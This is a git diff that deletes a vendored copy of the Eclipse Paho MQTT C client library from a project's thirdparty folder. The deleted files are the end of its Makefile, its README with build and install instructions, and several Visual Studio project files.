-LDFLAGS_AS += -Wl,-install_name,lib${MQTTLIB_AS}.so.${MAJOR_VERSION} -L /usr/local/opt/openssl/lib
-FLAGS_EXE += -DOSX
-FLAGS_EXES += -L /usr/local/opt/openssl/lib
-
-endif
-
-all: build
-
-build: | mkdir ${MQTTLIB_C_TARGET} ${MQTTLIB_CS_TARGET} ${MQTTLIB_A_TARGET} ${MQTTLIB_AS_TARGET} ${MQTTVERSION_TARGET} ${SYNC_SAMPLES} ${ASYNC_SAMPLES} ${SYNC_TESTS} ${SYNC_SSL_TESTS} ${ASYNC_TESTS} ${ASYNC_SSL_TESTS}
-
-clean:
-	rm -rf ${blddir}/*
-	rm -rf ${blddir_work}/*
-
-mkdir:
-	-mkdir -p ${blddir}/samples
-	-mkdir -p ${blddir}/test
-	echo OSTYPE is $(OSTYPE)
-
-${SYNC_TESTS}: ${blddir}/test/%: ${srcdir}/../test/%.c $(MQTTLIB_C_TARGET)
-	${CC} -DNOSTACKTRACE $(srcdir)/Thread.c -g -o $@ $< -l${MQTTLIB_C} ${FLAGS_EXE}
-
-${SYNC_SSL_TESTS}: ${blddir}/test/%: ${srcdir}/../test/%.c $(MQTTLIB_CS_TARGET)
-	${CC} -g -o $@ $< -l${MQTTLIB_CS} ${FLAGS_EXES}
-
-${ASYNC_TESTS}: ${blddir}/test/%: ${srcdir}/../test/%.c $(MQTTLIB_CS_TARGET)
-	${CC} -g -o $@ $< -l${MQTTLIB_A} ${FLAGS_EXE}
-
-${ASYNC_SSL_TESTS}: ${blddir}/test/%: ${srcdir}/../test/%.c $(MQTTLIB_CS_TARGET) $(MQTTLIB_AS_TARGET)
-	${CC} -g -o $@ $< -l${MQTTLIB_AS} ${FLAGS_EXES}
-
-${SYNC_SAMPLES}: ${blddir}/samples/%: ${srcdir}/samples/%.c $(MQTTLIB_C_TARGET)
-	${CC} -o $@ $< -l${MQTTLIB_C} ${FLAGS_EXE}
-
-${ASYNC_SAMPLES}: ${blddir}/samples/%: ${srcdir}/samples/%.c $(MQTTLIB_A_TARGET)
-	${CC} -o $@ $< -l${MQTTLIB_A} ${FLAGS_EXE}
-
-$(blddir_work)/VersionInfo.h: $(srcdir)/VersionInfo.h.in
-	$(SED_COMMAND) $< > $@
-
-${MQTTLIB_C_TARGET}: ${SOURCE_FILES_C} ${HEADERS_C} $(blddir_work)/VersionInfo.h
-	${CC} ${CCFLAGS_SO} -o $@ ${SOURCE_FILES_C} ${LDFLAGS_C}
-	-ln -s lib$(MQTTLIB_C).so.${VERSION}  ${blddir}/lib$(MQTTLIB_C).so.${MAJOR_VERSION}
-	-ln -s lib$(MQTTLIB_C).so.${MAJOR_VERSION} ${blddir}/lib$(MQTTLIB_C).so
-
-${MQTTLIB_CS_TARGET}: ${SOURCE_FILES_CS} ${HEADERS_C} $(blddir_work)/VersionInfo.h
-	${CC} ${CCFLAGS_SO} -o $@ ${SOURCE_FILES_CS} -DOPENSSL ${LDFLAGS_CS}
-	-ln -s lib$(MQTTLIB_CS).so.${VERSION}  ${blddir}/lib$(MQTTLIB_CS).so.${MAJOR_VERSION}
-	-ln -s lib$(MQTTLIB_CS).so.${MAJOR_VERSION} ${blddir}/lib$(MQTTLIB_CS).so
-
-${MQTTLIB_A_TARGET}: ${SOURCE_FILES_A} ${HEADERS_A} $(blddir_work)/VersionInfo.h
-	${CC} ${CCFLAGS_SO} -o $@ ${SOURCE_FILES_A} ${LDFLAGS_A}
-	-ln -s lib$(MQTTLIB_A).so.${VERSION}  ${blddir}/lib$(MQTTLIB_A).so.${MAJOR_VERSION}
-	-ln -s lib$(MQTTLIB_A).so.${MAJOR_VERSION} ${blddir}/lib$(MQTTLIB_A).so
-
-${MQTTLIB_AS_TARGET}: ${SOURCE_FILES_AS} ${HEADERS_A} $(blddir_work)/VersionInfo.h
-	${CC} ${CCFLAGS_SO} -o $@ ${SOURCE_FILES_AS} -DOPENSSL ${LDFLAGS_AS}
-	-ln -s lib$(MQTTLIB_AS).so.${VERSION}  ${blddir}/lib$(MQTTLIB_AS).so.${MAJOR_VERSION}
-	-ln -s lib$(MQTTLIB_AS).so.${MAJOR_VERSION} ${blddir}/lib$(MQTTLIB_AS).so
-
-${MQTTVERSION_TARGET}: $(srcdir)/MQTTVersion.c $(srcdir)/MQTTAsync.h ${MQTTLIB_A_TARGET} $(MQTTLIB_CS_TARGET)
-	${CC} ${FLAGS_EXE} -o $@ -l${MQTTLIB_A} $(srcdir)/MQTTVersion.c -ldl
-
-strip_options:
-	$(eval INSTALL_OPTS := -s)
-
-install-strip: build strip_options install
-
-install: build
-	$(INSTALL_DATA) ${INSTALL_OPTS} ${MQTTLIB_C_TARGET} $(DESTDIR)${libdir}
-	$(INSTALL_DATA) ${INSTALL_OPTS} ${MQTTLIB_CS_TARGET} $(DESTDIR)${libdir}
-	$(INSTALL_DATA) ${INSTALL_OPTS} ${MQTTLIB_A_TARGET} $(DESTDIR)${libdir}
-	$(INSTALL_DATA) ${INSTALL_OPTS} ${MQTTLIB_AS_TARGET} $(DESTDIR)${libdir}
-	$(INSTALL_PROGRAM) ${INSTALL_OPTS} ${MQTTVERSION_TARGET} $(DESTDIR)${bindir}
-	$(LDCONFIG) $(DESTDIR)${libdir}
-	ln -s lib$(MQTTLIB_C).so.${MAJOR_VERSION} $(DESTDIR)${libdir}/lib$(MQTTLIB_C).so
-	ln -s lib$(MQTTLIB_CS).so.${MAJOR_VERSION} $(DESTDIR)${libdir}/lib$(MQTTLIB_CS).so
-	ln -s lib$(MQTTLIB_A).so.${MAJOR_VERSION} $(DESTDIR)${libdir}/lib$(MQTTLIB_A).so
-	ln -s lib$(MQTTLIB_AS).so.${MAJOR_VERSION} $(DESTDIR)${libdir}/lib$(MQTTLIB_AS).so
-	$(INSTALL_DATA) ${srcdir}/MQTTAsync.h $(DESTDIR)${includedir}
-	$(INSTALL_DATA) ${srcdir}/MQTTClient.h $(DESTDIR)${includedir}
-	$(INSTALL_DATA) ${srcdir}/MQTTClientPersistence.h $(DESTDIR)${includedir}
-
-uninstall:
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_C).so.${VERSION}
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_CS).so.${VERSION}
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_A).so.${VERSION}
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_AS).so.${VERSION}
-	rm $(DESTDIR)${bindir}/MQTTVersion
-	$(LDCONFIG) $(DESTDIR)${libdir}
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_C).so
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_CS).so
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_A).so
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_AS).so
-	rm $(DESTDIR)${includedir}/MQTTAsync.h
-	rm $(DESTDIR)${includedir}/MQTTClient.h
-	rm $(DESTDIR)${includedir}/MQTTClientPersistence.h
-
-REGEX_DOXYGEN := \
-    's;@PROJECT_SOURCE_DIR@/src/\?;;' \
-    's;@PROJECT_SOURCE_DIR@;..;' \
-    's;@CMAKE_CURRENT_BINARY_DIR@;../build/output;'
-SED_DOXYGEN := $(foreach sed_exp,$(REGEX_DOXYGEN),-e $(sed_exp))
-define process_doxygen
-	cd ${srcdir}; sed $(SED_DOXYGEN) ../doc/${1}.in > ../$(docdir_work)/${1}
-	cd ${srcdir}; $(DOXYGEN_COMMAND) ../$(docdir_work)/${1}
-endef
-html:
-	-mkdir -p $(docdir_work)
-	-mkdir -p ${docdir}
-	$(call process_doxygen,DoxyfileV3ClientAPI)
-	$(call process_doxygen,DoxyfileV3AsyncAPI)
-	$(call process_doxygen,DoxyfileV3ClientInternal)
diff --git a/thirdparty/paho.mqtt.c/README.md b/thirdparty/paho.mqtt.c/README.md
deleted file mode 100644
index 66dfec7..0000000
--- a/thirdparty/paho.mqtt.c/README.md
+++ /dev/null
@@ -1,215 +0,0 @@
-# Eclipse Paho MQTT C client
-
-This repository contains the source code for the [Eclipse Paho](http://eclipse.org/paho) MQTT C client library.
-
-This code builds libraries which enable applications to connect to an [MQTT](http://mqtt.org) broker to publish messages, and to subscribe to topics and receive published messages.
-
-Both synchronous and asynchronous modes of operation are supported.
-
-## Build Status
-
-Linux Build Status: [![Linux Build Status](https://travis-ci.org/eclipse/paho.mqtt.c.svg?branch=master)](https://travis-ci.org/eclipse/paho.mqtt.c)
-
-## Libraries
-
-The Paho C client comprises four shared libraries:
-
- * libmqttv3a.so - asynchronous
- * libmqttv3as.so - asynchronous with SSL
- * libmqttv3c.so - "classic" / synchronous
- * libmqttv3cs.so - "classic" / synchronous with SSL
-
-Optionally, using the CMake build, you can build static versions of those libraries.
-
-## Build instructions for GNU Make
-
-Ensure the OpenSSL development package is installed.  Then from the client library base directory run:
-
-```
-make
-sudo make install
-```
-
-This will build and install the libraries.  To uninstall:
-
-```
-sudo make uninstall
-```
-
-To build the documentation requires doxygen and optionally graphviz.
-
-```
-make html
-```
-
-The provided GNU Makefile is intended to perform all build steps in the ```build``` directory within the source-tree of Eclipse Paho. Generated binares, libraries, and the documentation can be found in the ```build/output``` directory after completion. 
-
-Options that are passed to the compiler/linker can be specified by typical Unix build variables:
-
-Variable | Description
------------- | -------------
-CC | Path to the C compiler
-CFLAGS | Flags passed to compiler calls
-LDFLAGS | Flags passed to linker calls
-
-
-## Build requirements / compilation using CMake
-
-There build process currently supports a number of Linux "flavors" including ARM and s390, OS X, AIX and Solaris as well as the Windows operating system. The build process requires the following tools:
-  * CMake (http://cmake.org)
-  * Ninja (https://martine.github.io/ninja/) or
-    GNU Make (https://www.gnu.org/software/make/), and
-  * gcc (https://gcc.gnu.org/).
-
-On Debian based systems this would mean that the following packages have to be installed:
-
-```
-apt-get install build-essential gcc make cmake cmake-gui cmake-curses-gui
-```
-
-Also, in order to build a debian package from the source code, the following packages have to be installed
-
-```
-apt-get install fakeroot fakeroot devscripts dh-make lsb-release
-```
-
-Ninja can be downloaded from its github project page in the "releases" section. Optionally it is possible to build binaries with SSL support. This requires the OpenSSL libraries and includes to be available. E. g. on Debian:
-
-```
-apt-get install libssl-dev
-```
-
-The documentation requires doxygen and optionally graphviz:
-
-```
-apt-get install doxygen graphviz
-```
-
-Before compiling, determine the value of some variables in order to configure features, library locations, and other options:
-
-Variable | Default Value | Description
------------- | ------------- | -------------
-PAHO_BUILD_STATIC | FALSE | Build a static version of the libraries
-PAHO_WITH_SSL | FALSE | Flag that defines whether to build ssl-enabled binaries too. 
-OPENSSL_SEARCH_PATH | "" (system default) | Directory containing your OpenSSL installation (i.e. `/usr/local` when headers are in `/usr/local/include` and libraries are in `/usr/local/lib`)
-PAHO_BUILD_DOCUMENTATION | FALSE | Create and install the HTML based API documentation (requires Doxygen)
-PAHO_BUILD_SAMPLES | FALSE | Build sample programs
-MQTT_TEST_BROKER | tcp://localhost:1883 | MQTT connection URL for a broker to use during test execution
-MQTT_TEST_PROXY | tcp://localhost:1883 | Hostname of the test proxy to use
-MQTT_SSL_HOSTNAME | localhost | Hostname of a test SSL MQTT broker to use
-PAHO_BUILD_DEB_PACKAGE | FALSE | Build debian package
-
-Using these variables CMake can be used to generate your Ninja or Make files. Using CMake, building out-of-source is the default. Therefore it is recommended to invoke all build commands inside your chosen build directory but outside of the source tree.
-
-An example build session targeting the build platform could look like this:
-
-```
-mkdir /tmp/build.paho
-cd /tmp/build.paho
-cmake -GNinja -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=TRUE -DPAHO_BUILD_SAMPLES=TRUE ~/git/org.eclipse.paho.mqtt.c
-```
-
-Invoking cmake and specifying build options can also be performed using cmake-gui or ccmake (see https://cmake.org/runningcmake/). For example:
-
-```
-ccmake -GNinja ~/git/org.eclipse.paho.mqtt.c
-```
-
-To compile/link the binaries and to generate packages, simply invoke `ninja package` or `make -j <number-of-cores-to-use> package` after CMake. To simply compile/link invoke `ninja` or `make -j <number-of-cores-to-use>`.
-
-### Debug builds
-
-Debug builds can be performed by defining the value of the ```CMAKE_BUILD_TYPE``` option to ```Debug```. For example:
-
-```
-cmake -GNinja -DCMAKE_BUILD_TYPE=Debug git/org.eclipse.paho.mqtt.c
-```
-
-
-### Running the tests
-
-Test code is available in the ``test`` directory. The tests can be built and executed with the CMake build system. The test execution requires a MQTT broker running. By default, the build system uses ```localhost```, however it is possible to configure the build to use an external broker. These parameters are documented in the Build Requirements section above.
-
-After ensuring a MQTT broker is available, it is possible to execute the tests by starting the proxy and running `ctest` as described below:
-
-```
-python ../test/mqttsas2.py &
-ctest -VV
-```
-
-### Cross compilation
-
-Cross compilation using CMake is performed by using so called "toolchain files" (see: http://www.vtk.org/Wiki/CMake_Cross_Compiling).
-
-The path to the toolchain file can be specified by using CMake's `-DCMAKE_TOOLCHAIN_FILE` option. In case no toolchain file is specified, the build is performed for the native build platform.
-
-For your convenience toolchain files for the following platforms can be found in the `cmake` directory of Eclipse Paho:
-  * Linux x86
-  * Linux ARM11 (a.k.a. the Raspberry Pi)
-  * Windows x86_64
-  * Windows x86
-
-The provided toolchain files assume that required compilers/linkers are to be found in the environment, i. e. the PATH-Variable of your user or system. If you prefer, you can also specify the absolute location of your compilers in the toolchain files.
-
-Example invocation for the Raspberry Pi:
-
-```
-cmake -GNinja -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_SAMPLES=TRUE -DPAHO_BUILD_DOCUMENTATION=TRUE -DOPENSSL_LIB_SEARCH_PATH=/tmp/libssl-dev/usr/lib/arm-linux-gnueabihf -DOPENSSL_INC_SEARCH_PATH="/tmp/libssl-dev/usr/include/openssl;/tmp/libssl-dev/usr/include/arm-linux-gnueabihf" -DCMAKE_TOOLCHAIN_FILE=~/git/org.eclipse.paho.mqtt.c/cmake/toolchain.linux-arm11.cmake ~/git/org.eclipse.paho.mqtt.c
-```
-
-Compilers for the Raspberry Pi can be obtained from e. g. Linaro (see: http://releases.linaro.org/15.06/components/toolchain/binaries/4.8/arm-linux-gnueabihf/). This example assumes that OpenSSL-libraries and includes have been installed in the ```/tmp/libssl-dev``` directory.
-
-Example invocation for Windows 64 bit:
-
-```
-cmake -GNinja -DPAHO_BUILD_SAMPLES=TRUE -DCMAKE_TOOLCHAIN_FILE=~/git/org.eclipse.paho.mqtt.c/cmake/toolchain.win64.cmake ~/git/org.eclipse.paho.mqtt.c
-
-```
-
-In this case the libraries and executable are not linked against OpenSSL Libraries. Cross compilers for the Windows platform can be installed on Debian like systems like this:
-
-```
-apt-get install gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
-```
-
-## Usage and API
-
-Detailed API documentation is available by building the Doxygen docs in the  ``doc`` directory. A [snapshot is also available online](https://www.eclipse.org/paho/files/mqttdoc/MQTTClient/html/index.html).
-
-Samples are available in the Doxygen docs and also in ``src/samples`` for reference.
-
-Note that using the C headers from a C++ program requires the following declaration as part of the C++ code:
-
-```
-    extern "C" {
-    #include "MQTTClient.h"
-    #include "MQTTClientPersistence.h"
-    }
-```
-
-## Runtime tracing
-
-A number of environment variables control runtime tracing of the C library.
-
-Tracing is switched on using ``MQTT_C_CLIENT_TRACE`` (a value of ON traces to stdout, any other value should specify a file to trace to).
-
-The verbosity of the output is controlled using the  ``MQTT_C_CLIENT_TRACE_LEVEL`` environment variable - valid values are ERROR, PROTOCOL, MINIMUM, MEDIUM and MAXIMUM (from least to most verbose).
-
-The variable ``MQTT_C_CLIENT_TRACE_MAX_LINES`` limits the number of lines of trace that are output.
-
-```
-export MQTT_C_CLIENT_TRACE=ON
-export MQTT_C_CLIENT_TRACE_LEVEL=PROTOCOL
-```
-
-## Reporting bugs
-
-Please open issues in the Github project: https://github.com/eclipse/paho.mqtt.c/issues.
-
-## More information
-
-Discussion of the Paho clients takes place on the [Eclipse paho-dev mailing list](https://dev.eclipse.org/mailman/listinfo/paho-dev).
-
-General questions about the MQTT protocol are discussed in the [MQTT Google Group](https://groups.google.com/forum/?hl=en-US&fromgroups#!forum/mqtt).
-
-There is much more information available via the [MQTT community site](http://mqtt.org).
diff --git a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj
deleted file mode 100644
index 3ae0451..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj
+++ /dev/null
@@ -1,166 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>ConsoleApplication1</RootNamespace>
-    <ProjectName>MQTTVersion</ProjectName>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <Text Include="ReadMe.txt" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\MQTTVersion.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClient.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.filters
deleted file mode 100644
index 2442da5..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.filters
+++ /dev/null
@@ -1,36 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <Text Include="ReadMe.txt" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.user
deleted file mode 100644
index ef5ff2a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.user
+++ /dev/null
@@ -1,4 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup />
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/Paho C MQTT APIs.sln b/thirdparty/paho.mqtt.c/Windows Build/Paho C MQTT APIs.sln
deleted file mode 100644
index 6b5fcb1..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/Paho C MQTT APIs.sln
+++ /dev/null
@@ -1,155 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 15
-VisualStudioVersion = 15.0.26228.9
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-mqtt3c", "paho-mqtt3c\paho-mqtt3c.vcxproj", "{172F8995-C780-44A1-996C-C7949B4DB35A}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-mqtt3a", "paho-mqtt3a\paho-mqtt3a.vcxproj", "{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-cs-sub", "stdoutsub\stdoutsub.vcxproj", "{DFDF6238-DA97-4474-84C2-D313E8B985AE}"
-	ProjectSection(ProjectDependencies) = postProject
-		{172F8995-C780-44A1-996C-C7949B4DB35A} = {172F8995-C780-44A1-996C-C7949B4DB35A}
-	EndProjectSection
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-cs-pub", "stdoutsuba\stdoutsuba.vcxproj", "{AF322561-C692-43D3-8502-CC1E6CD2869A}"
-	ProjectSection(ProjectDependencies) = postProject
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9} = {B479B6EF-787D-4716-912A-E0F6F7BDA7A9}
-	EndProjectSection
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MQTTVersion", "MQTTVersion\MQTTVersion.vcxproj", "{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-mqtt3as", "paho-mqtt3as\paho-mqtt3as.vcxproj", "{DEF21D1B-CB65-4A78-805F-CF421249EB83}"
-EndProject
